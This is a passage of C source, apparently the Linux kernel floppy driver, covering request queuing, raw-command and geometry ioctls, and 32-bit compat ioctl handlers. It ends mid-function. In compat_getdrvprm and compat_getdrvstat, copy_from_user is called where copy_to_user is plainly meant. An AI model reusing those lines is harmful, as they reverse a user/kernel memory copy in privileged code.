if (!_floppy) { /* Autodetection */
if (!probing) {
DRS->probed_format = 0;
if (next_valid_format()) {
DPRINT("no autodetectable formats\n");
_floppy = NULL;
request_done(0);
goto do_request;
}
}
probing = 1;
_floppy = floppy_type + DP->autodetect[DRS->probed_format];
} else
probing = 0;
errors = &(current_req->error_count);
tmp = make_raw_rw_request();
if (tmp < 2) {
request_done(tmp);
goto do_request;
}
if (test_bit(FD_NEED_TWADDLE_BIT, &DRS->flags))
twaddle();
schedule_bh(floppy_start);
debugt(__func__, "queue fd request");
return;
}
static const struct cont_t rw_cont = {
.interrupt = rw_interrupt,
.redo = redo_fd_request,
.error = bad_flp_intr,
.done = request_done
};
static void process_fd_request(void)
{
cont = &rw_cont;
schedule_bh(redo_fd_request);
}
static blk_status_t floppy_queue_rq(struct blk_mq_hw_ctx *hctx,
const struct blk_mq_queue_data *bd)
{
blk_mq_start_request(bd->rq);
if (WARN(max_buffer_sectors == 0,
"VFS: %s called on non-open device\n", __func__))
return BLK_STS_IOERR;
if (WARN(atomic_read(&usage_count) == 0,
"warning: usage count=0, current_req=%p sect=%ld flags=%llx\n",
current_req, (long)blk_rq_pos(current_req),
(unsigned long long) current_req->cmd_flags))
return BLK_STS_IOERR;
spin_lock_irq(&floppy_lock);
list_add_tail(&bd->rq->queuelist, &floppy_reqs);
spin_unlock_irq(&floppy_lock);
if (test_and_set_bit(0, &fdc_busy)) {
/* fdc busy, this new request will be treated when the
current one is done */
is_alive(__func__, "old request running");
return BLK_STS_OK;
}
command_status = FD_COMMAND_NONE;
__reschedule_timeout(MAXTIMEOUT, "fd_request");
set_fdc(0);
process_fd_request();
is_alive(__func__, "");
return BLK_STS_OK;
}
static const struct cont_t poll_cont = {
.interrupt = success_and_wakeup,
.redo = floppy_ready,
.error = generic_failure,
.done = generic_done
};
static int poll_drive(bool interruptible, int flag)
{
/* no auto-sense, just clear dcl */
raw_cmd = &default_raw_cmd;
raw_cmd->flags = flag;
raw_cmd->track = 0;
raw_cmd->cmd_count = 0;
cont = &poll_cont;
debug_dcl(DP->flags, "setting NEWCHANGE in poll_drive\n");
set_bit(FD_DISK_NEWCHANGE_BIT, &DRS->flags);
return wait_til_done(floppy_ready, interruptible);
}
/*
* User triggered reset
* ====================
*/
static void reset_intr(void)
{
pr_info("weird, reset interrupt called\n");
}
static const struct cont_t reset_cont = {
.interrupt = reset_intr,
.redo = success_and_wakeup,
.error = generic_failure,
.done = generic_done
};
static int user_reset_fdc(int drive, int arg, bool interruptible)
{
int ret;
if (lock_fdc(drive))
return -EINTR;
if (arg == FD_RESET_ALWAYS)
FDCS->reset = 1;
if (FDCS->reset) {
cont = &reset_cont;
ret = wait_til_done(reset_fdc, interruptible);
if (ret == -EINTR)
return -EINTR;
}
process_fd_request();
return 0;
}
/*
* Misc Ioctl's and support
* ========================
*/
static inline int fd_copyout(void __user *param, const void *address,
unsigned long size)
{
return copy_to_user(param, address, size) ? -EFAULT : 0;
}
static inline int fd_copyin(void __user *param, void *address,
unsigned long size)
{
return copy_from_user(address, param, size) ? -EFAULT : 0;
}
static const char *drive_name(int type, int drive)
{
struct floppy_struct *floppy;
if (type)
floppy = floppy_type + type;
else {
if (UDP->native_format)
floppy = floppy_type + UDP->native_format;
else
return "(null)";
}
if (floppy->name)
return floppy->name;
else
return "(null)";
}
/* raw commands */
static void raw_cmd_done(int flag)
{
int i;
if (!flag) {
raw_cmd->flags |= FD_RAW_FAILURE;
raw_cmd->flags |= FD_RAW_HARDFAILURE;
} else {
raw_cmd->reply_count = inr;
if (raw_cmd->reply_count > MAX_REPLIES)
raw_cmd->reply_count = 0;
for (i = 0; i < raw_cmd->reply_count; i++)
raw_cmd->reply[i] = reply_buffer[i];
if (raw_cmd->flags & (FD_RAW_READ | FD_RAW_WRITE)) {
unsigned long flags;
flags = claim_dma_lock();
raw_cmd->length = fd_get_dma_residue();
release_dma_lock(flags);
}
if ((raw_cmd->flags & FD_RAW_SOFTFAILURE) &&
(!raw_cmd->reply_count || (raw_cmd->reply[0] & 0xc0)))
raw_cmd->flags |= FD_RAW_FAILURE;
if (disk_change(current_drive))
raw_cmd->flags |= FD_RAW_DISK_CHANGE;
else
raw_cmd->flags &= ~FD_RAW_DISK_CHANGE;
if (raw_cmd->flags & FD_RAW_NO_MOTOR_AFTER)
motor_off_callback(&motor_off_timer[current_drive]);
if (raw_cmd->next &&
(!(raw_cmd->flags & FD_RAW_FAILURE) ||
!(raw_cmd->flags & FD_RAW_STOP_IF_FAILURE)) &&
((raw_cmd->flags & FD_RAW_FAILURE) ||
!(raw_cmd->flags & FD_RAW_STOP_IF_SUCCESS))) {
raw_cmd = raw_cmd->next;
return;
}
}
generic_done(flag);
}
static const struct cont_t raw_cmd_cont = {
.interrupt = success_and_wakeup,
.redo = floppy_start,
.error = generic_failure,
.done = raw_cmd_done
};
static int raw_cmd_copyout(int cmd, void __user *param,
struct floppy_raw_cmd *ptr)
{
int ret;
while (ptr) {
struct floppy_raw_cmd cmd = *ptr;
cmd.next = NULL;
cmd.kernel_data = NULL;
ret = copy_to_user(param, &cmd, sizeof(cmd));
if (ret)
return -EFAULT;
param += sizeof(struct floppy_raw_cmd);
if ((ptr->flags & FD_RAW_READ) && ptr->buffer_length) {
if (ptr->length >= 0 &&
ptr->length <= ptr->buffer_length) {
long length = ptr->buffer_length - ptr->length;
ret = fd_copyout(ptr->data, ptr->kernel_data,
length);
if (ret)
return ret;
}
}
ptr = ptr->next;
}
return 0;
}
static void raw_cmd_free(struct floppy_raw_cmd **ptr)
{
struct floppy_raw_cmd *next;
struct floppy_raw_cmd *this;
this = *ptr;
*ptr = NULL;
while (this) {
if (this->buffer_length) {
fd_dma_mem_free((unsigned long)this->kernel_data,
this->buffer_length);
this->buffer_length = 0;
}
next = this->next;
kfree(this);
this = next;
}
}
static int raw_cmd_copyin(int cmd, void __user *param,
struct floppy_raw_cmd **rcmd)
{
struct floppy_raw_cmd *ptr;
int ret;
int i;
*rcmd = NULL;
loop:
ptr = kmalloc(sizeof(struct floppy_raw_cmd), GFP_KERNEL);
if (!ptr)
return -ENOMEM;
*rcmd = ptr;
ret = copy_from_user(ptr, param, sizeof(*ptr));
ptr->next = NULL;
ptr->buffer_length = 0;
ptr->kernel_data = NULL;
if (ret)
return -EFAULT;
param += sizeof(struct floppy_raw_cmd);
if (ptr->cmd_count > 33)
/* the command may now also take up the space
* initially intended for the reply & the
* reply count. Needed for long 82078 commands
* such as RESTORE, which takes ... 17 command
* bytes. Murphy's law #137: When you reserve
* 16 bytes for a structure, you'll one day
* discover that you really need 17...
*/
return -EINVAL;
for (i = 0; i < 16; i++)
ptr->reply[i] = 0;
ptr->resultcode = 0;
if (ptr->flags & (FD_RAW_READ | FD_RAW_WRITE)) {
if (ptr->length <= 0)
return -EINVAL;
ptr->kernel_data = (char *)fd_dma_mem_alloc(ptr->length);
fallback_on_nodma_alloc(&ptr->kernel_data, ptr->length);
if (!ptr->kernel_data)
return -ENOMEM;
ptr->buffer_length = ptr->length;
}
if (ptr->flags & FD_RAW_WRITE) {
ret = fd_copyin(ptr->data, ptr->kernel_data, ptr->length);
if (ret)
return ret;
}
if (ptr->flags & FD_RAW_MORE) {
rcmd = &(ptr->next);
ptr->rate &= 0x43;
goto loop;
}
return 0;
}
static int raw_cmd_ioctl(int cmd, void __user *param)
{
struct floppy_raw_cmd *my_raw_cmd;
int drive;
int ret2;
int ret;
if (FDCS->rawcmd <= 1)
FDCS->rawcmd = 1;
for (drive = 0; drive < N_DRIVE; drive++) {
if (FDC(drive) != fdc)
continue;
if (drive == current_drive) {
if (UDRS->fd_ref > 1) {
FDCS->rawcmd = 2;
break;
}
} else if (UDRS->fd_ref) {
FDCS->rawcmd = 2;
break;
}
}
if (FDCS->reset)
return -EIO;
ret = raw_cmd_copyin(cmd, param, &my_raw_cmd);
if (ret) {
raw_cmd_free(&my_raw_cmd);
return ret;
}
raw_cmd = my_raw_cmd;
cont = &raw_cmd_cont;
ret = wait_til_done(floppy_start, true);
debug_dcl(DP->flags, "calling disk change from raw_cmd ioctl\n");
if (ret != -EINTR && FDCS->reset)
ret = -EIO;
DRS->track = NO_TRACK;
ret2 = raw_cmd_copyout(cmd, param, my_raw_cmd);
if (!ret)
ret = ret2;
raw_cmd_free(&my_raw_cmd);
return ret;
}
static int invalidate_drive(struct block_device *bdev)
{
/* invalidate the buffer track to force a reread */
set_bit((long)bdev->bd_disk->private_data, &fake_change);
process_fd_request();
check_disk_change(bdev);
return 0;
}
static int set_geometry(unsigned int cmd, struct floppy_struct *g,
int drive, int type, struct block_device *bdev)
{
int cnt;
/* sanity checking for parameters. */
if (g->sect <= 0 ||
g->head <= 0 ||
/* check for zero in F_SECT_PER_TRACK */
(unsigned char)((g->sect << 2) >> FD_SIZECODE(g)) == 0 ||
g->track <= 0 || g->track > UDP->tracks >> STRETCH(g) ||
/* check if reserved bits are set */
(g->stretch & ~(FD_STRETCH | FD_SWAPSIDES | FD_SECTBASEMASK)) != 0)
return -EINVAL;
if (type) {
if (!capable(CAP_SYS_ADMIN))
return -EPERM;
mutex_lock(&open_lock);
if (lock_fdc(drive)) {
mutex_unlock(&open_lock);
return -EINTR;
}
floppy_type[type] = *g;
floppy_type[type].name = "user format";
for (cnt = type << 2; cnt < (type << 2) + 4; cnt++)
floppy_sizes[cnt] = floppy_sizes[cnt + 0x80] =
floppy_type[type].size + 1;
process_fd_request();
for (cnt = 0; cnt < N_DRIVE; cnt++) {
struct block_device *bdev = opened_bdev[cnt];
if (!bdev || ITYPE(drive_state[cnt].fd_device) != type)
continue;
__invalidate_device(bdev, true);
}
mutex_unlock(&open_lock);
} else {
int oldStretch;
if (lock_fdc(drive))
return -EINTR;
if (cmd != FDDEFPRM) {
/* notice a disk change immediately, else
* we lose our settings immediately*/
if (poll_drive(true, FD_RAW_NEED_DISK) == -EINTR)
return -EINTR;
}
oldStretch = g->stretch;
user_params[drive] = *g;
if (buffer_drive == drive)
SUPBOUND(buffer_max, user_params[drive].sect);
current_type[drive] = &user_params[drive];
floppy_sizes[drive] = user_params[drive].size;
if (cmd == FDDEFPRM)
DRS->keep_data = -1;
else
DRS->keep_data = 1;
/* invalidation. Invalidate only when needed, i.e.
* when there are already sectors in the buffer cache
* whose number will change. This is useful, because
* mtools often changes the geometry of the disk after
* looking at the boot block */
if (DRS->maxblock > user_params[drive].sect ||
DRS->maxtrack ||
((user_params[drive].sect ^ oldStretch) &
(FD_SWAPSIDES | FD_SECTBASEMASK)))
invalidate_drive(bdev);
else
process_fd_request();
}
return 0;
}
/* handle obsolete ioctl's */
static unsigned int ioctl_table[] = {
FDCLRPRM,
FDSETPRM,
FDDEFPRM,
FDGETPRM,
FDMSGON,
FDMSGOFF,
FDFMTBEG,
FDFMTTRK,
FDFMTEND,
FDSETEMSGTRESH,
FDFLUSH,
FDSETMAXERRS,
FDGETMAXERRS,
FDGETDRVTYP,
FDSETDRVPRM,
FDGETDRVPRM,
FDGETDRVSTAT,
FDPOLLDRVSTAT,
FDRESET,
FDGETFDCSTAT,
FDWERRORCLR,
FDWERRORGET,
FDRAWCMD,
FDEJECT,
FDTWADDLE
};
static int normalize_ioctl(unsigned int *cmd, int *size)
{
int i;
for (i = 0; i < ARRAY_SIZE(ioctl_table); i++) {
if ((*cmd & 0xffff) == (ioctl_table[i] & 0xffff)) {
*size = _IOC_SIZE(*cmd);
*cmd = ioctl_table[i];
if (*size > _IOC_SIZE(*cmd)) {
pr_info("ioctl not yet supported\n");
return -EFAULT;
}
return 0;
}
}
return -EINVAL;
}
static int get_floppy_geometry(int drive, int type, struct floppy_struct **g)
{
if (type)
*g = &floppy_type[type];
else {
if (lock_fdc(drive))
return -EINTR;
if (poll_drive(false, 0) == -EINTR)
return -EINTR;
process_fd_request();
*g = current_type[drive];
}
if (!*g)
return -ENODEV;
return 0;
}
static int fd_getgeo(struct block_device *bdev, struct hd_geometry *geo)
{
int drive = (long)bdev->bd_disk->private_data;
int type = ITYPE(drive_state[drive].fd_device);
struct floppy_struct *g;
int ret;
ret = get_floppy_geometry(drive, type, &g);
if (ret)
return ret;
geo->heads = g->head;
geo->sectors = g->sect;
geo->cylinders = g->track;
return 0;
}
static bool valid_floppy_drive_params(const short autodetect[8],
int native_format)
{
size_t floppy_type_size = ARRAY_SIZE(floppy_type);
size_t i = 0;
for (i = 0; i < 8; ++i) {
if (autodetect[i] < 0 ||
autodetect[i] >= floppy_type_size)
return false;
}
if (native_format < 0 || native_format >= floppy_type_size)
return false;
return true;
}
static int fd_locked_ioctl(struct block_device *bdev, fmode_t mode, unsigned int cmd,
unsigned long param)
{
int drive = (long)bdev->bd_disk->private_data;
int type = ITYPE(UDRS->fd_device);
int i;
int ret;
int size;
union inparam {
struct floppy_struct g; /* geometry */
struct format_descr f;
struct floppy_max_errors max_errors;
struct floppy_drive_params dp;
} inparam; /* parameters coming from user space */
const void *outparam; /* parameters passed back to user space */
/* convert compatibility eject ioctls into floppy eject ioctl.
* We do this in order to provide a means to eject floppy disks before
* installing the new fdutils package */
if (cmd == CDROMEJECT || /* CD-ROM eject */
cmd == 0x6470) { /* SunOS floppy eject */
DPRINT("obsolete eject ioctl\n");
DPRINT("please use floppycontrol --eject\n");
cmd = FDEJECT;
}
if (!((cmd & 0xff00) == 0x0200))
return -EINVAL;
/* convert the old style command into a new style command */
ret = normalize_ioctl(&cmd, &size);
if (ret)
return ret;
/* permission checks */
if (((cmd & 0x40) && !(mode & (FMODE_WRITE | FMODE_WRITE_IOCTL))) ||
((cmd & 0x80) && !capable(CAP_SYS_ADMIN)))
return -EPERM;
if (WARN_ON(size < 0 || size > sizeof(inparam)))
return -EINVAL;
/* copyin */
memset(&inparam, 0, sizeof(inparam));
if (_IOC_DIR(cmd) & _IOC_WRITE) {
ret = fd_copyin((void __user *)param, &inparam, size);
if (ret)
return ret;
}
switch (cmd) {
case FDEJECT:
if (UDRS->fd_ref != 1)
/* somebody else has this drive open */
return -EBUSY;
if (lock_fdc(drive))
return -EINTR;
/* do the actual eject. Fails on
* non-Sparc architectures */
ret = fd_eject(UNIT(drive));
set_bit(FD_DISK_CHANGED_BIT, &UDRS->flags);
set_bit(FD_VERIFY_BIT, &UDRS->flags);
process_fd_request();
return ret;
case FDCLRPRM:
if (lock_fdc(drive))
return -EINTR;
current_type[drive] = NULL;
floppy_sizes[drive] = MAX_DISK_SIZE << 1;
UDRS->keep_data = 0;
return invalidate_drive(bdev);
case FDSETPRM:
case FDDEFPRM:
return set_geometry(cmd, &inparam.g, drive, type, bdev);
case FDGETPRM:
ret = get_floppy_geometry(drive, type,
(struct floppy_struct **)&outparam);
if (ret)
return ret;
memcpy(&inparam.g, outparam,
offsetof(struct floppy_struct, name));
outparam = &inparam.g;
break;
case FDMSGON:
UDP->flags |= FTD_MSG;
return 0;
case FDMSGOFF:
UDP->flags &= ~FTD_MSG;
return 0;
case FDFMTBEG:
if (lock_fdc(drive))
return -EINTR;
if (poll_drive(true, FD_RAW_NEED_DISK) == -EINTR)
return -EINTR;
ret = UDRS->flags;
process_fd_request();
if (ret & FD_VERIFY)
return -ENODEV;
if (!(ret & FD_DISK_WRITABLE))
return -EROFS;
return 0;
case FDFMTTRK:
if (UDRS->fd_ref != 1)
return -EBUSY;
return do_format(drive, &inparam.f);
case FDFMTEND:
case FDFLUSH:
if (lock_fdc(drive))
return -EINTR;
return invalidate_drive(bdev);
case FDSETEMSGTRESH:
UDP->max_errors.reporting = (unsigned short)(param & 0x0f);
return 0;
case FDGETMAXERRS:
outparam = &UDP->max_errors;
break;
case FDSETMAXERRS:
UDP->max_errors = inparam.max_errors;
break;
case FDGETDRVTYP:
outparam = drive_name(type, drive);
SUPBOUND(size, strlen((const char *)outparam) + 1);
break;
case FDSETDRVPRM:
if (!valid_floppy_drive_params(inparam.dp.autodetect,
inparam.dp.native_format))
return -EINVAL;
*UDP = inparam.dp;
break;
case FDGETDRVPRM:
outparam = UDP;
break;
case FDPOLLDRVSTAT:
if (lock_fdc(drive))
return -EINTR;
if (poll_drive(true, FD_RAW_NEED_DISK) == -EINTR)
return -EINTR;
process_fd_request();
/* fall through */
case FDGETDRVSTAT:
outparam = UDRS;
break;
case FDRESET:
return user_reset_fdc(drive, (int)param, true);
case FDGETFDCSTAT:
outparam = UFDCS;
break;
case FDWERRORCLR:
memset(UDRWE, 0, sizeof(*UDRWE));
return 0;
case FDWERRORGET:
outparam = UDRWE;
break;
case FDRAWCMD:
if (type)
return -EINVAL;
if (lock_fdc(drive))
return -EINTR;
set_floppy(drive);
i = raw_cmd_ioctl(cmd, (void __user *)param);
if (i == -EINTR)
return -EINTR;
process_fd_request();
return i;
case FDTWADDLE:
if (lock_fdc(drive))
return -EINTR;
twaddle();
process_fd_request();
return 0;
default:
return -EINVAL;
}
if (_IOC_DIR(cmd) & _IOC_READ)
return fd_copyout((void __user *)param, outparam, size);
return 0;
}
static int fd_ioctl(struct block_device *bdev, fmode_t mode,
unsigned int cmd, unsigned long param)
{
int ret;
mutex_lock(&floppy_mutex);
ret = fd_locked_ioctl(bdev, mode, cmd, param);
mutex_unlock(&floppy_mutex);
return ret;
}
#ifdef CONFIG_COMPAT
struct compat_floppy_drive_params {
char cmos;
compat_ulong_t max_dtr;
compat_ulong_t hlt;
compat_ulong_t hut;
compat_ulong_t srt;
compat_ulong_t spinup;
compat_ulong_t spindown;
unsigned char spindown_offset;
unsigned char select_delay;
unsigned char rps;
unsigned char tracks;
compat_ulong_t timeout;
unsigned char interleave_sect;
struct floppy_max_errors max_errors;
char flags;
char read_track;
short autodetect[8];
compat_int_t checkfreq;
compat_int_t native_format;
};
struct compat_floppy_drive_struct {
signed char flags;
compat_ulong_t spinup_date;
compat_ulong_t select_date;
compat_ulong_t first_read_date;
short probed_format;
short track;
short maxblock;
short maxtrack;
compat_int_t generation;
compat_int_t keep_data;
compat_int_t fd_ref;
compat_int_t fd_device;
compat_int_t last_checked;
compat_caddr_t dmabuf;
compat_int_t bufblocks;
};
struct compat_floppy_fdc_state {
compat_int_t spec1;
compat_int_t spec2;
compat_int_t dtr;
unsigned char version;
unsigned char dor;
compat_ulong_t address;
unsigned int rawcmd:2;
unsigned int reset:1;
unsigned int need_configure:1;
unsigned int perp_mode:2;
unsigned int has_fifo:1;
unsigned int driver_version;
unsigned char track[4];
};
struct compat_floppy_write_errors {
unsigned int write_errors;
compat_ulong_t first_error_sector;
compat_int_t first_error_generation;
compat_ulong_t last_error_sector;
compat_int_t last_error_generation;
compat_uint_t badness;
};
#define FDSETPRM32 _IOW(2, 0x42, struct compat_floppy_struct)
#define FDDEFPRM32 _IOW(2, 0x43, struct compat_floppy_struct)
#define FDSETDRVPRM32 _IOW(2, 0x90, struct compat_floppy_drive_params)
#define FDGETDRVPRM32 _IOR(2, 0x11, struct compat_floppy_drive_params)
#define FDGETDRVSTAT32 _IOR(2, 0x12, struct compat_floppy_drive_struct)
#define FDPOLLDRVSTAT32 _IOR(2, 0x13, struct compat_floppy_drive_struct)
#define FDGETFDCSTAT32 _IOR(2, 0x15, struct compat_floppy_fdc_state)
#define FDWERRORGET32 _IOR(2, 0x17, struct compat_floppy_write_errors)
static int compat_set_geometry(struct block_device *bdev, fmode_t mode, unsigned int cmd,
struct compat_floppy_struct __user *arg)
{
struct floppy_struct v;
int drive, type;
int err;
BUILD_BUG_ON(offsetof(struct floppy_struct, name) !=
offsetof(struct compat_floppy_struct, name));
if (!(mode & (FMODE_WRITE | FMODE_WRITE_IOCTL)))
return -EPERM;
memset(&v, 0, sizeof(struct floppy_struct));
if (copy_from_user(&v, arg, offsetof(struct floppy_struct, name)))
return -EFAULT;
mutex_lock(&floppy_mutex);
drive = (long)bdev->bd_disk->private_data;
type = ITYPE(UDRS->fd_device);
err = set_geometry(cmd == FDSETPRM32 ? FDSETPRM : FDDEFPRM,
&v, drive, type, bdev);
mutex_unlock(&floppy_mutex);
return err;
}
static int compat_get_prm(int drive,
struct compat_floppy_struct __user *arg)
{
struct compat_floppy_struct v;
struct floppy_struct *p;
int err;
memset(&v, 0, sizeof(v));
mutex_lock(&floppy_mutex);
err = get_floppy_geometry(drive, ITYPE(UDRS->fd_device), &p);
if (err) {
mutex_unlock(&floppy_mutex);
return err;
}
memcpy(&v, p, offsetof(struct floppy_struct, name));
mutex_unlock(&floppy_mutex);
if (copy_to_user(arg, &v, sizeof(struct compat_floppy_struct)))
return -EFAULT;
return 0;
}
static int compat_setdrvprm(int drive,
struct compat_floppy_drive_params __user *arg)
{
struct compat_floppy_drive_params v;
if (!capable(CAP_SYS_ADMIN))
return -EPERM;
if (copy_from_user(&v, arg, sizeof(struct compat_floppy_drive_params)))
return -EFAULT;
if (!valid_floppy_drive_params(v.autodetect, v.native_format))
return -EINVAL;
mutex_lock(&floppy_mutex);
UDP->cmos = v.cmos;
UDP->max_dtr = v.max_dtr;
UDP->hlt = v.hlt;
UDP->hut = v.hut;
UDP->srt = v.srt;
UDP->spinup = v.spinup;
UDP->spindown = v.spindown;
UDP->spindown_offset = v.spindown_offset;
UDP->select_delay = v.select_delay;
UDP->rps = v.rps;
UDP->tracks = v.tracks;
UDP->timeout = v.timeout;
UDP->interleave_sect = v.interleave_sect;
UDP->max_errors = v.max_errors;
UDP->flags = v.flags;
UDP->read_track = v.read_track;
memcpy(UDP->autodetect, v.autodetect, sizeof(v.autodetect));
UDP->checkfreq = v.checkfreq;
UDP->native_format = v.native_format;
mutex_unlock(&floppy_mutex);
return 0;
}
static int compat_getdrvprm(int drive,
struct compat_floppy_drive_params __user *arg)
{
struct compat_floppy_drive_params v;
memset(&v, 0, sizeof(struct compat_floppy_drive_params));
mutex_lock(&floppy_mutex);
v.cmos = UDP->cmos;
v.max_dtr = UDP->max_dtr;
v.hlt = UDP->hlt;
v.hut = UDP->hut;
v.srt = UDP->srt;
v.spinup = UDP->spinup;
v.spindown = UDP->spindown;
v.spindown_offset = UDP->spindown_offset;
v.select_delay = UDP->select_delay;
v.rps = UDP->rps;
v.tracks = UDP->tracks;
v.timeout = UDP->timeout;
v.interleave_sect = UDP->interleave_sect;
v.max_errors = UDP->max_errors;
v.flags = UDP->flags;
v.read_track = UDP->read_track;
memcpy(v.autodetect, UDP->autodetect, sizeof(v.autodetect));
v.checkfreq = UDP->checkfreq;
v.native_format = UDP->native_format;
mutex_unlock(&floppy_mutex);
if (copy_from_user(arg, &v, sizeof(struct compat_floppy_drive_params)))
return -EFAULT;
return 0;
}
static int compat_getdrvstat(int drive, bool poll,
struct compat_floppy_drive_struct __user *arg)
{
struct compat_floppy_drive_struct v;
memset(&v, 0, sizeof(struct compat_floppy_drive_struct));
mutex_lock(&floppy_mutex);
if (poll) {
if (lock_fdc(drive))
goto Eintr;
if (poll_drive(true, FD_RAW_NEED_DISK) == -EINTR)
goto Eintr;
process_fd_request();
}
v.spinup_date = UDRS->spinup_date;
v.select_date = UDRS->select_date;
v.first_read_date = UDRS->first_read_date;
v.probed_format = UDRS->probed_format;
v.track = UDRS->track;
v.maxblock = UDRS->maxblock;
v.maxtrack = UDRS->maxtrack;
v.generation = UDRS->generation;
v.keep_data = UDRS->keep_data;
v.fd_ref = UDRS->fd_ref;
v.fd_device = UDRS->fd_device;
v.last_checked = UDRS->last_checked;
v.dmabuf = (uintptr_t)UDRS->dmabuf;
v.bufblocks = UDRS->bufblocks;
mutex_unlock(&floppy_mutex);
if (copy_from_user(arg, &v, sizeof(struct compat_floppy_drive_struct)))
return -EFAULT;
return 0;
Eintr:
mutex_unlock(&floppy_mutex);
return -EINTR;
}
static int compat_getfdcstat(int drive,
struct compat_floppy_fdc_state __user *arg)
{
struct compat_floppy_fdc_state v32;
struct floppy_fdc_state v;
mutex_lock(&floppy_mutex);
v = *UFDCS;
mutex_unlock(&floppy_mutex);
memset(&v32, 0, sizeof(struct compat_floppy_fdc_state));
v32.spec1 = v.spec1;
v32.spec2 = v.spec2;
v32.dtr = v.dtr;
v32.version = v.version;
v32.dor = v.dor;
v32.address = v.address;
v32.rawcmd = v.rawcmd;
v32.reset = v.reset;
v32.need_configure = v.need_configure;
v32.perp_mode = v.perp_mode;
v32.has_fifo = v.has_fifo;
v32.driver_version = v.driver_version;
memcpy(v32.track, v.track, 4);
if (copy_to_user(arg, &v32, sizeof(struct compat_floppy_fdc_state)))
return -EFAULT;
return 0;
}
static int compat_werrorget(int drive,
struct compat_floppy_write_errors __user *arg)
{
struct compat_floppy_write_errors v32;
struct floppy_write_errors v;
memset(&v32, 0, sizeof(struct compat_floppy_write_errors));
mutex_lock(&floppy_mutex);
v = *UDRWE;
mutex_unlock(&floppy_mutex);
v32.write_errors = v.write_errors;
v32.first_error_sector = v.first_error_sector;
v32.first_error_generation = v.first_error_generation;
v32.last_error_sector = v.last_error_sector;
v32.last_error_generation = v.last_error_generation;
v32.badness = v.badness;
if (copy_to_user(arg, &v32, sizeof(struct compat_floppy_write_errors)))
return -EFAULT;
return 0;
}
static int fd_compat_ioctl(struct block_device *bdev, fmode_t mode, unsigned int cmd,
unsigned long param)
{
int drive = (long)bdev->bd_disk->private_data;
switch (cmd) {
case FDMSGON:
case FDMSGOFF:
case FDSETEMSGTRESH:
case FDFLUSH:
case FDWERRORCLR:
case FDEJECT:
case FDCLRPRM:
case FDFMTBEG:
case FDRESET:
case FDTWADDLE:
return fd_ioctl(bdev, mode, cmd, param);
case FDSETMAXERRS:
case FDGETMAXERRS:
case FDGETDRVTYP:
case FDFMTEND:
case FDFMTTRK:
case FDRAWCMD:
return fd_ioctl(bdev, mode, cmd,
(unsigned long)compat_ptr(param));
case FDSETPRM32:
case FDDEFPRM32:
return compat_set_geometry(bdev, mode, cmd, compat_ptr(param));
case FDGETPRM32:
return compat_get_prm(drive, compat_ptr(param));
case FDSETDRVPRM32:
return compat_setdrvprm(drive, compat_ptr(param));
case FDGETDRVPRM32:
return compat_getdrvprm(drive, compat_ptr(param));
case FDPOLLDRVSTAT32:
return compat_getdrvstat(drive, true, compat_ptr(param));
case FDGETDRVSTAT32:
return compat_getdrvstat(drive, false, compat_ptr(param));
case FDGETFDCSTAT32:
return compat_getfdcstat(drive, compat_ptr(param));
case FDWERRORGET32:
return compat_werrorget(drive, compat_ptr(param));
}
return -EINVAL;
}
#endif
static void __init config_types(void)
{
bool has_drive = false;
int drive;
/* read drive info out of physical CMOS */
drive = 0;
if (!UDP->cmos)
UDP->cmos = FLOPPY0_TYPE;
drive = 1;
if (!UDP->cmos && FLOPPY1_TYPE)
UDP->cmos = FLOPPY1_TYPE;
/* FIXME: additional physical CMOS drive detection should go here */
for (drive = 0; drive < N_DRIVE; drive++) {
unsigned int type = UDP->cmos;
struct floppy_drive_params *params;
const char *name = NULL;
char temparea[32];
if (type < ARRAY_SIZE(default_drive_params)) {
params = &default_drive_params[type].params;
if (type) {
name = default_drive_params[type].name;
allowed_drive_mask |= 1 << drive;
} else
allowed_drive_mask &= ~(1 << drive);
} else {
params = &default_drive_params[0].params;
snprintf(temparea, sizeof(temparea),
"unknown type %d (usb?)", type);
name = temparea;
}
if (name) {
const char *prepend;
if (!has_drive) {
prepend = "";
has_drive = true;
pr_info("Floppy drive(s):");
} else {
prepend = ",";
}
pr_cont("%s fd%d is %s", prepend, drive, name);
}
*UDP = *params;
}
if (has_drive)
pr_cont("\n");
}
static void floppy_release(struct gendisk *disk, fmode_t mode)
{
int drive = (long)disk->private_data;
mutex_lock(&floppy_mutex);
mutex_lock(&open_lock);
if (!UDRS->fd_ref--) {
DPRINT("floppy_release with fd_ref == 0");
UDRS->fd_ref = 0;
}
if (!UDRS->fd_ref)
opened_bdev[drive] = NULL;
mutex_unlock(&open_lock);
mutex_unlock(&floppy_mutex);
}
/*
* floppy_open check for aliasing (/dev/fd0 can be the same as
* /dev/PS0 etc), and disallows simultaneous access to the same
* drive with different device numbers.
*/
static int floppy_open(struct block_device *bdev, fmode_t mode)
{
int drive = (long)bdev->bd_disk->private_data;
int old_dev, new_dev;
int try;
int res = -EBUSY;
char *tmp;
mutex_lock(&floppy_mutex);
mutex_lock(&open_lock);
old_dev = UDRS->fd_device;
if (opened_bdev[drive] && opened_bdev[drive] != bdev)
goto out2;
if (!UDRS->fd_ref && (UDP->flags & FD_BROKEN_DCL)) {
set_bit(FD_DISK_CHANGED_BIT, &UDRS->flags);
set_bit(FD_VERIFY_BIT, &UDRS->flags);
}
UDRS->fd_ref++;
opened_bdev[drive] = bdev;
res = -ENXIO;
if (!floppy_track_buffer) {
/* if opening an ED drive, reserve a big buffer,
* else reserve a small one */
if ((UDP->cmos == 6) || (UDP->cmos == 5))
try = 64; /* Only 48 actually useful */
else
try = 32; /* Only 24 actually useful */
tmp = (char *)fd_dma_mem_alloc(1024 * try);
if (!tmp && !floppy_track_buffer) {
try >>= 1; /* buffer only one side */
INFBOUND(try, 16);
tmp = (char *)fd_dma_mem_alloc(1024 * try);
}
if (!tmp && !floppy_track_buffer)
fallback_on_nodma_alloc(&tmp, 2048 * try);
if (!tmp && !floppy_track_buffer) {
DPRINT("Unable to allocate DMA memory\n");
goto out;
}
if (floppy_track_buffer) {
if (tmp)
fd_dma_mem_free((unsigned long)tmp, try * 1024);
} else {
buffer_min = buffer_max = -1;
floppy_track_buffer = tmp;
max_buffer_sectors = try;
}
}
new_dev = MINOR(bdev->bd_dev);
UDRS->fd_device = new_dev;
set_capacity(disks[drive], floppy_sizes[new_dev]);
if (old_dev != -1 && old_dev != new_dev) {
if (buffer_drive == drive)
buffer_track = -1;
}
if (UFDCS->rawcmd == 1)
UFDCS->rawcmd = 2;
if (!(mode & FMODE_NDELAY)) {
if (mode & (FMODE_READ|FMODE_WRITE)) {
UDRS->last_checked = 0;
clear_bit(FD_OPEN_SHOULD_FAIL_BIT, &UDRS->flags);
